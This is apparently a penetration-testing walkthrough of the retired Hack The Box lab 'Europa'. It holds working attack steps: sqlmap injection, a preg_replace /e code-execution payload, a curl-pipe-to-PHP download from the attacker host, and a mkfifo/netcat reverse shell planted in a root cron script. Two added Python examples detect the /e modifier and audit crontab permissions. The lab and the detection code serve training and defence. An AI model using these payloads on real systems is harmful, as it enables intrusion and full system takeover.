HTB – Europa

Today we are going to solve another CTF challenge, "Europa", one of the retired vulnerable labs presented by Hack The Box and available online for anyone who wants to sharpen their penetration-testing skills.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.22
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-21 15:43 W. Europe Standard Time
Nmap scan report for 10.10.10.22
Host is up (0.025s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| 256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_ 256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after: 2027-04-17T09:06:22
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
| http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.94 seconds

As in all our previous labs, we started by browsing to the target IP on port 80. This time it only served the Apache default page, so that got us nowhere.

The certificate on port 443, however, lists two hostnames, so the next step was to add the target IP to /etc/hosts with the names europacorp.htb and admin-portal.europacorp.htb (name-based virtual hosts are common on Hack The Box machines).

Browsing to https://admin-portal.europacorp.htb then shows the login page below.

To get past the login I tried a form-based SQL injection, using sqlmap to enumerate the database names:

sqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form --dbs --batch

Our assumption held: the login form is injectable, and sqlmap dumped a database named "admin".

Next I dumped everything in that database:

sqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form -D admin --all --batch

It contains a table "users" with two entries, each holding a username and a hashed password.

The hash was MD5; an online lookup returned "SupersecretPassword!", and those credentials logged me into the admin console.

After a successful login I landed on a dashboard and headed for the Tools section.

Tools holds an OpenVPN config generator that builds the config by calling the PHP function preg_replace() on user input. Every reference on that function gives the same advice: never let the user control the pattern argument, because the /e (eval) modifier turns a string replacement into code execution.

Taking that advice at face value, I captured the generator's request in Burp Suite and sent it to Repeater.

The request carries three parameters, pattern, ipaddress and text, and the server feeds them to preg_replace() in that order: pattern is the regex, ipaddress the replacement, text the subject. Any of them can carry our input, but before exploiting it you need to know exactly how the bug works.

Searching further turns up plenty of references describing the /e modifier as the threat in preg_replace(): with it set, PHP passes the replacement string through eval() for every match (the modifier was deprecated in PHP 5.5 and removed in 7.0, which is why the bug is rarer today).

Code is therefore executed by sending a POST body in the following format. Note that the ipaddress value must be valid PHP, such as a system() call, because it is eval'd as PHP rather than handed to a shell:

pattern=/ip_address/e&ipaddress=<PHP code>&text=ip_address

For example, to list the working directory, send the following and check the output:

pattern=/ip_address/e&ipaddress=system('ls')&text=ip_address
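On the detection side, here is an added example (my own code, not part of the original write-up or the Europa application) that parses a submitted pattern the way PHP's preg_* functions do and flags the e modifier whatever delimiter is used. A plain grep for "/e" misses patterns like #ip_address#e or {ip_address}e and false-positives on a regex containing an escaped slash, so the parser tracks the delimiter, escapes and bracket nesting. The POST bodies it checks are constructed to mirror the request above; the function names are mine.

```python
"""Flag HTTP form bodies that smuggle PHP's /e (eval) regex modifier.

Added example, not code from the original write-up.  preg_replace() parses a
pattern as <delimiter> regex <delimiter> modifiers.  The delimiter is the
first non-blank character; if it is one of ( [ { < the closing delimiter is
the matching bracket, otherwise it is the same character again.  Whatever
follows the closing delimiter is the modifier string, and 'e' (deprecated in
PHP 5.5, removed in 7.0) makes the replacement be eval()'d as PHP code.
The sample POST bodies below are constructed.
"""
from urllib.parse import parse_qs

BRACKET_PAIRS = {"(": ")", "[": "]", "{": "}", "<": ">"}


def php_pattern_modifiers(pattern):
    """Return the modifier string of a PHP PCRE pattern, or None if PHP would reject it."""
    p = pattern.lstrip()                 # PHP skips leading whitespace
    if not p:
        return None
    delim = p[0]
    if delim.isalnum() or delim == "\\":
        return None                      # PHP: delimiter must not be alphanumeric or backslash
    closing = BRACKET_PAIRS.get(delim, delim)
    depth = 1
    i = 1
    while i < len(p):
        c = p[i]
        if c == "\\" and i + 1 < len(p):
            i += 2                       # backslash escapes the next char, delimiter included
            continue
        if delim in BRACKET_PAIRS:
            if c == delim:
                depth += 1               # nested brackets are counted, as PHP does
            elif c == closing:
                depth -= 1
                if depth == 0:
                    break
        elif c == closing:
            break
        i += 1
    else:
        return None                      # no closing delimiter: PHP warns and returns NULL
    # PHP ignores whitespace among the modifiers
    return "".join(ch for ch in p[i + 1:] if ch not in " \n\r")


def uses_eval_modifier(value):
    """True if `value`, read as a PHP pattern, carries the e modifier."""
    mods = php_pattern_modifiers(value)
    return mods is not None and "e" in mods


def naive_has_slash_e(value):
    """The substring check this example improves on, kept for comparison."""
    return "/e" in value


def flag_request(body):
    """Return [(param, value)] for form fields whose value is an /e pattern."""
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            if uses_eval_modifier(v):
                hits.append((name, v))
    return hits


# Constructed POST bodies in the shape of the exploit request above.
SAMPLE_BODIES = [
    "pattern=/ip_address/e&ipaddress=system('ls')&text=ip_address",   # the exploit
    "pattern=#ip_address#e&ipaddress=system('id')&text=ip_address",   # other delimiter
    "pattern={ip_address}ie&ipaddress=system('id')&text=ip_address",  # bracket delimiter
    "pattern=/ip_address/&ipaddress=10.10.10.22&text=ip_address",     # legitimate use
    "pattern=/\\/e/&ipaddress=x&text=x",                              # '/e' inside the regex
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(flag_request(body) or "clean", "<-", body)
```

Running it flags the first three bodies and passes the last two; naive_has_slash_e() gets the second and fifth wrong, which is the point of parsing delimiters properly before writing a WAF or log-search rule for this.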

Any other command can be run the same way, which is all we need for a reverse connection.

Now it is just a matter of changing the argument to system() so that it fetches and runs a PHP reverse shell. Set up an HTTP server to serve the PHP file and a netcat listener to catch the shell:

D:\PENTEST\HTB\europa>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [07/Nov/2018 09:22:20] "GET /shell.php HTTP/1.1" 200 -
Then, in Burp Repeater, the ipaddress value becomes: system('curl http://10.10.14.28/shell.php | php')

C:\Users\hillie>nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.28] from www.europacorp.htb [10.10.10.22] 43764
Linux europa 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:17:06 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
10:16:14 up 13:06, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@europa:/var/www/cmd$ whoami && id 
whoami && id 
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation

Following my usual enumeration steps I found a vulnerable cron job:

$ cat /etc/crontab

# /etc/crontab: system-wide crontab
# Unlike any other crontab you do not have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *	root	/var/www/cronjobs/clearlogs <---- THIS ONE HERE

Cron runs /var/www/cronjobs/clearlogs every minute as root. Its contents:

$ cat /var/www/cronjobs/clearlogs

#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

clearlogs truncates access.log and then runs /var/www/cmd/logcleared.sh, a file we can write to as www-data (or, if it does not exist yet, create and chmod 777, since exec() needs an executable file). Because we control its contents, we control what root executes every minute. Long story short, I dropped another reverse shell into it:

echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9876 > /tmp/f" > /var/www/cmd/logcleared.sh
chmod 777 /var/www/cmd/logcleared.sh

Note: use a different port for the second netcat listener; reusing the one the www-data shell is connected to won't work.

Within a minute the cron job runs /var/www/cronjobs/clearlogs, which executes our logcleared.sh and gives us a root shell:

C:\Users\hillie>nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.28] from www.europacorp.htb [10.10.10.22] 49460
/bin/sh: 0: can't access tty; job control turned off
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@europa:~# whoami && id && hostname
whoami && id && hostname
root
uid=0(root) gid=0(root) groups=0(root)
europa
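As an added example (my code, not the author's), the audit below automates what the crontab inspection above did by hand: it parses a system crontab and, for every job run as root, reports a script that is group/world-writable, owned by a non-root user, or missing from a directory others can write to, which is exactly the /var/www/cmd/logcleared.sh situation. It builds a throw-away directory layout mirroring the Europa case so it runs offline; the crontab text and paths are constructed, and trusted_uids is set to the current uid so the demo behaves the same whether or not it runs as root. On a real host, pass the contents of /etc/crontab (and each file in /etc/cron.d) to audit_crontab() with the default trusted_uids.

```python
"""Audit an /etc/crontab for root jobs whose script can be tampered with.

Added example, not code from the original write-up.  It automates the check
behind the Europa privilege escalation: a job run as root executes a file that
a low-privileged user can edit, or can create because the directory holding it
is writable.  The layout it audits is constructed in a temporary directory.
"""
import os
import shutil
import stat
import tempfile

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH


def parse_system_crontab(text):
    """Return [(user, command)] for each job line of a system crontab.

    System crontabs (/etc/crontab, /etc/cron.d/*) carry a user field after the
    five time fields; '@reboot'-style specials have a single time field.
    Blank lines, comments and VAR=value assignments are skipped.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)      # @special user command
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
        else:
            fields = line.split(None, 6)      # m h dom mon dow user command
            if len(fields) == 7:
                jobs.append((fields[5], fields[6]))
    return jobs


def _tamperable(st, trusted_uids):
    """True if a uid outside trusted_uids could write the inode described by st."""
    return st.st_uid not in trusted_uids or bool(st.st_mode & WRITE_BITS)


def unsafe_path(path, trusted_uids=(0,)):
    """Explain why `path` could be edited, created or replaced by an untrusted uid, else None.

    Only the file and its immediate directory are examined; ancestors such as
    /var are assumed root-owned and not writable by others.
    """
    parent = os.path.dirname(path) or "."
    try:
        st = os.stat(path)
    except FileNotFoundError:
        st = None
    if st is not None and _tamperable(st, trusted_uids):
        return f"owned by uid {st.st_uid}, mode {stat.filemode(st.st_mode)}: an untrusted user can write it"
    try:
        pst = os.stat(parent)
    except FileNotFoundError:
        return f"missing, and directory {parent} does not exist either (check its parent)"
    if st is None:
        if _tamperable(pst, trusted_uids):
            return f"missing, but directory {parent} is writable so an attacker can create it"
        return None
    # A sticky directory (like /tmp) lets others create files but not rename or
    # unlink entries they do not own, so an existing file there is only
    # replaceable when the directory owner itself is untrusted.
    sticky = bool(pst.st_mode & stat.S_ISVTX)
    if pst.st_uid not in trusted_uids or (pst.st_mode & WRITE_BITS and not sticky):
        return f"directory {parent} is writable so the file can be replaced"
    return None


def audit_crontab(text, trusted_uids=(0,), as_user="root"):
    """Return [(script, reason)] for jobs run as `as_user` whose script is tamperable.

    Only absolute first tokens are checked; 'cd', 'test' and other PATH-resolved
    names from the stock Ubuntu entries are skipped.
    """
    findings = []
    for user, command in parse_system_crontab(text):
        script = command.split()[0]
        if user != as_user or not script.startswith("/"):
            continue
        reason = unsafe_path(script, trusted_uids)
        if reason:
            findings.append((script, reason))
    return findings


# Constructed crontab mirroring the Europa entry; {d} is the temporary root.
CRONTAB_TEMPLATE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    {d}/cronjobs/clearlogs
* * * * *       root    {d}/cmd/logcleared.sh
0 3 * * *       root    {d}/bin/backup.sh -q
30 2 * * *      www-data {d}/cmd/logcleared.sh
"""


def build_demo():
    """Create the constructed layout, audit it as the current uid, clean up, return (root, findings)."""
    d = tempfile.mkdtemp(prefix="cronaudit_")
    try:
        for sub, mode in (("cronjobs", 0o755), ("cmd", 0o777), ("bin", 0o755)):
            os.mkdir(os.path.join(d, sub))
            os.chmod(os.path.join(d, sub), mode)
        clearlogs = os.path.join(d, "cronjobs", "clearlogs")
        with open(clearlogs, "w") as f:
            f.write("#!/usr/bin/php\n<?php exec('/var/www/cmd/logcleared.sh'); ?>\n")
        os.chmod(clearlogs, 0o755)          # fine on its own: owned by "root", not writable
        backup = os.path.join(d, "bin", "backup.sh")
        with open(backup, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(backup, 0o777)             # world-writable script run as root
        # cmd/logcleared.sh is deliberately absent: cmd/ is 0777, as on Europa.
        # The current uid stands in for root so the demo works unprivileged.
        findings = audit_crontab(CRONTAB_TEMPLATE.format(d=d), trusted_uids=(os.getuid(),))
    finally:
        shutil.rmtree(d)
    return d, findings


if __name__ == "__main__":
    _, hits = build_demo()
    for script, reason in hits:
        print(f"{script}: {reason}")
```

The demo reports the missing logcleared.sh in the writable cmd/ directory and the world-writable backup.sh, and stays quiet about clearlogs itself, whose only problem on the real box was the file it went on to exec.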

Author : Jacco Straathof
